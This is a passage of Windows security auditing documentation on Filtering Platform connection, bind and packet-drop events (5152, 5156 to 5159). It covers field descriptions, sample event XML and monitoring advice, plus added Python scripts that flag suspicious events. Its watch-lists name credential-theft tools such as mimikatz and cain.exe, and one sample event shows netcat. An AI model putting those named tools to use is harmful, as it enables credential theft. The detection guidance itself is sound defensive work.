Outbound – for outbound connections.
Source Address [Type = UnicodeString]: local IP address on which the application received the connection.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the connection.
Destination Address [Type = UnicodeString]: IP address from which connection was received or initiated.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to initiate
connection.
Protocol [Type = UInt32]: number of protocol which was used.

Service                                              Protocol number
Internet Control Message Protocol (ICMP)             1
Transmission Control Protocol (TCP)                  6
User Datagram Protocol (UDP)                         17
General Routing Encapsulation (PPTP data over GRE)   47
Authentication Header (AH) IPSec                     51
Encapsulation Security Payload (ESP) IPSec           50
Exterior Gateway Protocol (EGP)                      8
Gateway-Gateway Protocol (GGP)                       3
Host Monitoring Protocol (HMP)                       20
Internet Group Management Protocol (IGMP)            88
MIT Remote Virtual Disk (RVD)                        66
OSPF Open Shortest Path First                        89
PARC Universal Packet Protocol (PUP)                 12
Reliable Datagram Protocol (RDP)                     27
Reservation Protocol (RSVP) QoS                      46

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter that allowed the connection.
To find a specific Windows Filtering Platform filter by ID, run the following command: netsh wfp show filters. This command generates a filters.xml file. Open this file and search for the required filter ID (<filterId>), for example:
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows Filtering Platform layer by ID, run the following command: netsh wfp show state. This command generates a wfpstate.xml file. Open this file and search for the required layer ID (<layerId>), for example:
Security Monitoring Recommendations
For 5156(S): The Windows Filtering Platform has permitted a connection.
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
Check that “Source Address” is one of the addresses assigned to the computer.
If the computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5156 events where “Destination Address” is an IP address from the
Internet (not from private IP ranges).
If you know that the computer should never contact or be contacted by certain network IP addresses,
monitor for these addresses in “Destination Address.”
If you have a “whitelist” of IP addresses that the computer or device is expected to contact or be contacted
by, monitor for IP addresses in “Destination Address” that are not in the whitelist.
If you need to monitor all inbound connections to a specific local port, monitor for 5156 events with that
“Source Port.”
Monitor for all connections with a “Protocol Number” that is not typical for this device or computer, for
example, anything other than 1, 6, or 17.
If the computer’s communication with “Destination Address” should always use a specific “Destination
Port,” monitor for any other “Destination Port.”
5157(F): The Windows Filtering Platform has blocked a connection.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Connection
Event Description:
This event generates when Windows Filtering Platform has blocked a connection.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5157</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T03:46:51.662750400Z" />
<EventRecordID>304390</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="4520" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessID">4556</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="Direction">%%14592</Data>
<Data Name="SourceAddress">10.0.0.10</Data>
<Data Name="SourcePort">3333</Data>
<Data Name="DestAddress">10.0.0.100</Data>
<Data Name="DestPort">49218</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">110398</Data>
<Data Name="LayerName">%%14610</Data>
<Data Name="LayerRTID">44</Data>
<Data Name="RemoteUserID">S-1-0-0</Data>
<Data Name="RemoteMachineID">S-1-0-0</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to create the connection. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:

Network Information:
Direction [Type = UnicodeString]: direction of the blocked connection.
Inbound – for inbound connections.
Outbound – for outbound connections.
Source Address [Type = UnicodeString]: local IP address on which the application received the connection.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the connection.
Destination Address [Type = UnicodeString]: IP address from which connection was received or initiated.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to initiate
connection.
Protocol [Type = UInt32]: number of protocol which was used.

Service                                              Protocol number
Internet Control Message Protocol (ICMP)             1
Transmission Control Protocol (TCP)                  6
User Datagram Protocol (UDP)                         17
General Routing Encapsulation (PPTP data over GRE)   47
Authentication Header (AH) IPSec                     51
Encapsulation Security Payload (ESP) IPSec           50
Exterior Gateway Protocol (EGP)                      8
Gateway-Gateway Protocol (GGP)                       3
Host Monitoring Protocol (HMP)                       20
Internet Group Management Protocol (IGMP)            88
MIT Remote Virtual Disk (RVD)                        66
OSPF Open Shortest Path First                        89
PARC Universal Packet Protocol (PUP)                 12
Reliable Datagram Protocol (RDP)                     27
Reservation Protocol (RSVP) QoS                      46

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter that blocked the connection.
To find a specific Windows Filtering Platform filter by ID, run the following command: netsh wfp show filters. This command generates a filters.xml file. Open this file and search for the required filter ID (<filterId>), for example:
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows Filtering Platform layer by ID, run the following command: netsh wfp show state. This command generates a wfpstate.xml file. Open this file and search for the required layer ID (<layerId>), for example:
Security Monitoring Recommendations
For 5157(F): The Windows Filtering Platform has blocked a connection.
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
Check that “Source Address” is one of the addresses assigned to the computer.
If the computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5157 events where “Destination Address” is an IP address from the
Internet (not from private IP ranges).
If you know that the computer should never contact or be contacted by certain network IP addresses,
monitor for these addresses in “Destination Address.”
If you have a “whitelist” of IP addresses that the computer or device is expected to contact or be contacted
by, monitor for IP addresses in “Destination Address” that are not in the whitelist.
If you need to monitor all inbound connections to a specific local port, monitor for 5157 events with that
“Source Port.”
Monitor for all connections with a “Protocol Number” that is not typical for this device or computer, for
example, anything other than 1, 6, or 17.
If the computer’s communication with “Destination Address” should always use a specific “Destination
Port,” monitor for any other “Destination Port.”
5158(S): The Windows Filtering Platform has permitted a bind to a local port.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Connection
Event Description:
This event generates every time Windows Filtering Platform permits an application or service to bind to a local port.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5158</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T05:24:03.376171200Z" />
<EventRecordID>308122</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="3712" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessId">4556</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="SourceAddress">0.0.0.0</Data>
<Data Name="SourcePort">3333</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">0</Data>
<Data Name="LayerName">%%14608</Data>
<Data Name="LayerRTID">36</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to bind to the local port. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:

Network Information:
Source Address [Type = UnicodeString]: local IP address to which the application bound the port.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number to which the application bound.
Protocol [Type = UInt32]: number of protocol which was used.

Service                                              Protocol number
Internet Control Message Protocol (ICMP)             1
Transmission Control Protocol (TCP)                  6
User Datagram Protocol (UDP)                         17
General Routing Encapsulation (PPTP data over GRE)   47
Authentication Header (AH) IPSec                     51
Encapsulation Security Payload (ESP) IPSec           50
Exterior Gateway Protocol (EGP)                      8
Gateway-Gateway Protocol (GGP)                       3
Host Monitoring Protocol (HMP)                       20
Internet Group Management Protocol (IGMP)            88
MIT Remote Virtual Disk (RVD)                        66
OSPF Open Shortest Path First                        89
PARC Universal Packet Protocol (PUP)                 12
Reliable Datagram Protocol (RDP)                     27
Reservation Protocol (RSVP) QoS                      46

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter that allowed the application to bind the port. By default, Windows Firewall does not prevent an application from binding a port; if the application does not match any filter, this field contains the value 0.
To find a specific Windows Filtering Platform filter by ID, run the following command: netsh wfp show filters. This command generates a filters.xml file. Open this file and search for the required filter ID (<filterId>), for example:
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows Filtering Platform layer by ID, run the following command: netsh wfp show state. This command generates a wfpstate.xml file. Open this file and search for the required layer ID (<layerId>), for example:

Security Monitoring Recommendations
For 5158(S): The Windows Filtering Platform has permitted a bind to a local port.
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
Check that “Source Address” is one of the addresses assigned to the computer.
If you need to monitor all actions with a specific local port, monitor for 5158 events with that “Source
Port.”
Monitor for all connections with a “Protocol Number” that is not typical for this device or computer, for
example, anything other than 6 or 17.
If the computer’s communication with “Destination Address” should always use a specific “Destination
Port,” monitor for any other “Destination Port.”
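The checks in the 5154, 5156, 5157 and 5158 recommendation lists above can be automated against exported events. The following Python is an added example, not Microsoft's code: it parses the 5157 record from this page's Event XML plus a constructed 5156 record, and applies the recommended checks against a constructed per-host policy (the expected application, the host's local addresses, the folder lists and the typical protocol numbers are assumptions to adapt to your own whitelist).

```python
import ipaddress
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed per-host policy (assumption): what this host is expected to do.
POLICY = {
    "local_addresses": {"10.0.0.10", "0.0.0.0", "::", "127.0.0.1", "::1"},
    "expected_apps": {"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe"},
    "standard_folders": ("\\windows\\system32\\", "\\program files\\"),
    "restricted_folders": ("\\temporary internet files\\",),
    "restricted_substrings": ("mimikatz", "cain.exe"),
    "internet_allowed": False,
    # Protocol numbers the recommendations call typical: 1/6/17 for the
    # connection events, 6/17 for the bind event.
    "typical_protocols": {5156: {1, 6, 17}, 5157: {1, 6, 17}, 5158: {6, 17}},
}

# 5157 record copied from this page's Event XML (System element trimmed).
EVENT_5157 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>5157</EventID><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="ProcessID">4556</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="Direction">%%14592</Data>
<Data Name="SourceAddress">10.0.0.10</Data>
<Data Name="SourcePort">3333</Data>
<Data Name="DestAddress">10.0.0.100</Data>
<Data Name="DestPort">49218</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">110398</Data>
<Data Name="LayerName">%%14610</Data>
<Data Name="LayerRTID">44</Data>
</EventData>
</Event>"""


def make_event(event_id, **data):
    """Build a constructed event record in the page's schema (test input only)."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"</System><EventData>{body}</EventData></Event>")


def parse_event(xml_text):
    """Return EventID plus every EventData field, keyed by its Name attribute."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": int(root.findtext("e:System/e:EventID", namespaces=NS))}
    for d in root.findall("e:EventData/e:Data", NS):
        ev[d.get("Name")] = (d.text or "").strip()
    # The page renders the path with doubled backslashes; fold them and
    # lower-case so the folder and substring checks are case-insensitive.
    ev["Application"] = ev.get("Application", "").replace("\\\\", "\\").lower()
    return ev


def check_event(ev, policy=POLICY):
    """Apply the page's monitoring recommendations; return the findings raised."""
    findings = []
    app = ev["Application"]
    if app not in policy["expected_apps"]:
        findings.append("unexpected-application")
    if not any(f in app for f in policy["standard_folders"]):
        findings.append("application-outside-standard-folders")
    if any(f in app for f in policy["restricted_folders"]):
        findings.append("application-in-restricted-folder")
    if any(s in app for s in policy["restricted_substrings"]):
        findings.append("restricted-name-substring")
    if ev.get("SourceAddress") not in policy["local_addresses"]:
        findings.append("source-address-not-local")
    dest = ev.get("DestAddress")            # absent on the 5158 bind event
    if dest and not policy["internet_allowed"]:
        if ipaddress.ip_address(dest).is_global:
            findings.append("destination-on-internet")
    typical = policy["typical_protocols"].get(ev["EventID"], {1, 6, 17})
    if int(ev.get("Protocol", "0")) not in typical:
        findings.append("atypical-protocol")
    return findings


# Constructed 5156 record that should trip several checks at once.
EVENT_5156_SUSPICIOUS = make_event(
    5156,
    Application="\\device\\harddiskvolume2\\users\\test\\appdata\\local\\microsoft"
                "\\windows\\temporary internet files\\mimikatz.exe",
    SourceAddress="10.0.0.10", SourcePort="49500",
    DestAddress="8.8.8.8", DestPort="53",   # constructed; any non-private address
    Protocol="47",
)

if __name__ == "__main__":
    for raw in (EVENT_5157, EVENT_5156_SUSPICIOUS):
        ev = parse_event(raw)
        print(ev["EventID"], ev["Application"], "->", check_event(ev))
```

On a live host the same records can be exported with Get-WinEvent and each record's ToXml() method, then passed to parse_event.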
5159(F): The Windows Filtering Platform has blocked a bind to a local port.
4/22/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Connection
Event Description:
This event is logged if the Windows Filtering Platform has blocked a bind to a local port.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5159</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2019-04-19T07:36:55.955388300Z" />
<EventRecordID>44097</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="6480" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessId">7924</Data>
<Data Name="Application">\device\harddiskvolume2\users\test\desktop\netcat\nc.exe</Data>
<Data Name="SourceAddress">0.0.0.0</Data>
<Data Name="SourcePort">5555</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">84614</Data>
<Data Name="LayerName">%%14608</Data>
<Data Name="LayerRTID">36</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to bind to the local port. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:

Network Information:
Source Address [Type = UnicodeString]: the local IP address of the computer running the application.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: the port number used by the application.
Protocol [Type = UInt32]: the protocol number being used.

Service                                              Protocol number
Internet Control Message Protocol (ICMP)             1
Transmission Control Protocol (TCP)                  6
User Datagram Protocol (UDP)                         17
General Routing Encapsulation (PPTP data over GRE)   47
Authentication Header (AH) IPSec                     51
Encapsulation Security Payload (ESP) IPSec           50
Exterior Gateway Protocol (EGP)                      8
Gateway-Gateway Protocol (GGP)                       3
Host Monitoring Protocol (HMP)                       20
Internet Group Management Protocol (IGMP)            88
MIT Remote Virtual Disk (RVD)                        66
OSPF Open Shortest Path First                        89
PARC Universal Packet Protocol (PUP)                 12
Reliable Datagram Protocol (RDP)                     27
Reservation Protocol (RSVP) QoS                      46

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter that blocked the application from binding to the port. By default, Windows Firewall does not prevent an application from binding a port; if the application does not match any filter, this field contains the value 0.
To find a specific Windows Filtering Platform filter by ID, run the following command: netsh wfp show filters. This command generates a filters.xml file. Open this file and search for the required filter ID (<filterId>), for example:
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows Filtering Platform layer by ID, run the following command: netsh wfp show state. This command generates a wfpstate.xml file. Open this file and search for the required layer ID (<layerId>), for example:

Security Monitoring Recommendations
There is no recommendation for this event in this document.
Audit Filtering Platform Packet Drop
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Filtering Platform Packet Drop determines whether the operating system generates audit events when
packets are dropped by the Windows Filtering Platform.
Windows Filtering Platform (WFP) enables independent software vendors (ISVs) to filter and modify TCP/IP packets, monitor or authorize connections, filter Internet Protocol security (IPsec)-protected traffic, and filter remote procedure calls (RPCs).
A high rate of dropped packets may indicate that there have been attempts to gain unauthorized access to
computers on your network.
Event volume: High.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   No                No                No                 No
Member Server       No                No                No                 No
Workstation         No                No                No                 No

Comments (the same for all three computer types): Failure events volume typically is very high for this subcategory and typically used for troubleshooting. If you need to monitor blocked connections, it is better to use “5157(F): The Windows Filtering Platform has blocked a connection,” because it contains almost the same information and generates per-connection, not per-packet. There is no recommendation to enable Success auditing, because Success events in this subcategory rarely occur.

Events List:
5152(F): The Windows Filtering Platform blocked a packet.
5153(S): A more restrictive Windows Filtering Platform filter has blocked a packet.
5152(F): The Windows Filtering Platform blocked a packet.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Packet Drop
Event Description:
This event generates when Windows Filtering Platform has blocked a network packet.
This event is generated for every received network packet.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5152</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12809</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T16:52:37.274367300Z" />
<EventRecordID>321323</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="4456" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessId">4556</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="Direction">%%14592</Data>
<Data Name="SourceAddress">10.0.0.100</Data>
<Data Name="SourcePort">49278</Data>
<Data Name="DestAddress">10.0.0.10</Data>
<Data Name="DestPort">3333</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">0</Data>
<Data Name="LayerName">%%14610</Data>
<Data Name="LayerRTID">44</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process to which the blocked network packet was sent. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:

Network Information:
Direction [Type = UnicodeString]: direction of the blocked connection.
Inbound – for inbound connections.
Outbound – for outbound connections.
Source Address [Type = UnicodeString]: local IP address on which the application received the packet.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the packet.
Destination Address [Type = UnicodeString]: IP address from which packet was received or initiated.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to send the
packet.
Protocol [Type = UInt32]: number of the protocol that was used.

SERVICE                                              PROTOCOL NUMBER
Internet Control Message Protocol (ICMP)             1
Transmission Control Protocol (TCP)                  6
User Datagram Protocol (UDP)                         17
General Routing Encapsulation (PPTP data over GRE)   47
Authentication Header (AH) IPSec                     51
Encapsulation Security Payload (ESP) IPSec           50
Exterior Gateway Protocol (EGP)                      8
Gateway-Gateway Protocol (GGP)                       3
Host Monitoring Protocol (HMP)                       20
Internet Group Management Protocol (IGMP)            88
MIT Remote Virtual Disk (RVD)                        66
OSPF Open Shortest Path First                        89
PARC Universal Packet Protocol (PUP)                 12
Reliable Datagram Protocol (RDP)                     27
Reservation Protocol (RSVP) QoS                      46

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter that blocked the packet.
To find a specific Windows Filtering Platform filter by ID, run the following command: netsh
wfp show filters. This command generates a filters.xml file. Open this file
and search for the required filter ID in the <filterId> element.
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows
Filtering Platform layer ID, run the following command: netsh wfp show state. This command generates a
wfpstate.xml file. Open this file and search for the required layer ID in the <layerId> element.
Security Monitoring Recommendations
For 5152(F): The Windows Filtering Platform blocked a packet.
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
Check that Source Address is one of the addresses assigned to the computer.
If the computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5152 events where Destination Address is an IP address from the
Internet (not from private IP ranges).
If you know that the computer should never contact or be contacted by certain network IP addresses,
monitor for these addresses in “Destination Address.”
If you have a “whitelist” of IP addresses that the computer or device is expected to contact or be contacted
by, monitor for IP addresses in “Destination Address” that are not in the whitelist.
If you need to monitor all inbound connections to a specific local port, monitor for 5152 events with that
“Source Port.”
Monitor for all connections with a “Protocol Number” that is not typical for this device or computer, for
example, anything other than 1, 6, or 17.
If the computer’s communication with “Destination Address” should always use a specific “Destination
Port,” monitor for any other “Destination Port.”
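As an added example (not part of the original Microsoft documentation), the following Python script parses 5152 records in the Event XML shape shown above and applies the monitoring recommendations from this section: an application outside System32 or Program Files or inside a restricted folder, a watch-listed application name, a source address that is not one of the computer's own addresses, an Internet destination on a host that should not reach the Internet, a destination outside an allow list, and a protocol number other than 1, 6 or 17. The two event records, the local address set and the folder lists are constructed sample data; the Data Name attributes beyond those visible in the excerpt above (ProcessId, Application, SourceAddress, DestAddress) are assumed to follow the standard 5152 schema.

```python
import ipaddress
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Protocol numbers the recommendations treat as typical for most hosts: ICMP, TCP, UDP.
TYPICAL_PROTOCOLS = {1, 6, 17}

# The Application field uses the \device\harddiskvolume# form, so folders are matched
# as substrings of the lower-cased path rather than by drive letter (constructed lists).
STANDARD_FOLDERS = ("\\windows\\system32\\", "\\program files\\", "\\program files (x86)\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\",)
SUSPECT_SUBSTRINGS = ("mimikatz", "cain.exe")

# "Private" here means RFC 1918 plus loopback and link-local, for both IP versions.
PRIVATE_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]
WILDCARD_ADDRESSES = {"0.0.0.0", "::"}   # "all addresses", as the field description says


def parse_event(xml_text):
    """Return the EventID plus every EventData/Data field of one record, keyed by Name."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    fields["EventID"] = root.findtext("e:System/e:EventID", default="", namespaces=NS)
    return fields


def pid_decimal(fields):
    """Convert the hexadecimal Process ID to the decimal value Task Manager shows."""
    return int(fields.get("ProcessId", "0x0"), 16)


def is_internet_address(text):
    ip = ipaddress.ip_address(text)
    return not any(ip in net for net in PRIVATE_RANGES)


def review_5152(fields, local_addresses, allowed_destinations=(), internet_allowed=True):
    """Apply the monitoring recommendations to one parsed 5152 event.
    Returns a list of finding codes; an empty list means nothing stood out."""
    findings = []
    if fields.get("EventID") != "5152":
        return findings
    app = fields.get("Application", "").lower()
    if not any(folder in app for folder in STANDARD_FOLDERS):
        findings.append("application-outside-standard-folders")
    if any(folder in app for folder in RESTRICTED_FOLDERS):
        findings.append("application-in-restricted-folder")
    if any(word in app for word in SUSPECT_SUBSTRINGS):
        findings.append("application-name-on-watchlist")
    src = fields.get("SourceAddress", "")
    if src and src not in WILDCARD_ADDRESSES and src not in local_addresses:
        findings.append("source-address-not-local")
    dst = fields.get("DestAddress", "")
    if dst:
        if not internet_allowed and is_internet_address(dst):
            findings.append("internet-destination")
        if allowed_destinations and dst not in allowed_destinations:
            findings.append("destination-not-on-allow-list")
    proto = fields.get("Protocol", "")
    if proto.isdigit() and int(proto) not in TYPICAL_PROTOCOLS:
        findings.append("atypical-protocol")
    return findings


def make_event(**data):
    """Build a minimal 5152 record in the Event XML shape shown on the page
    (constructed sample data, not a real capture)."""
    body = "".join('<Data Name="%s">%s</Data>' % (k, v) for k, v in data.items())
    return ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            '<System><EventID>5152</EventID></System>'
            '<EventData>%s</EventData></Event>' % body)


BENIGN_EVENT = make_event(
    ProcessId="0x4", Application="\\device\\harddiskvolume2\\windows\\system32\\svchost.exe",
    SourceAddress="10.0.0.15", SourcePort="49152", DestAddress="10.0.0.5", DestPort="445", Protocol="6")
SUSPECT_EVENT = make_event(
    ProcessId="0x1a2c", Application="\\device\\harddiskvolume2\\users\\alice\\appdata\\local\\temp\\updater.exe",
    SourceAddress="10.0.0.15", SourcePort="50000", DestAddress="203.0.113.10", DestPort="3333", Protocol="47")

if __name__ == "__main__":
    for record in (BENIGN_EVENT, SUSPECT_EVENT):
        fields = parse_event(record)
        print(pid_decimal(fields), fields["Application"],
              review_5152(fields, {"10.0.0.15"}, internet_allowed=False))
```

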